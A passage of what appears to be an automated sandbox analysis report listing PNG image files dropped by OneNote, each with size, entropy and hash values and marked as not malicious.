                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
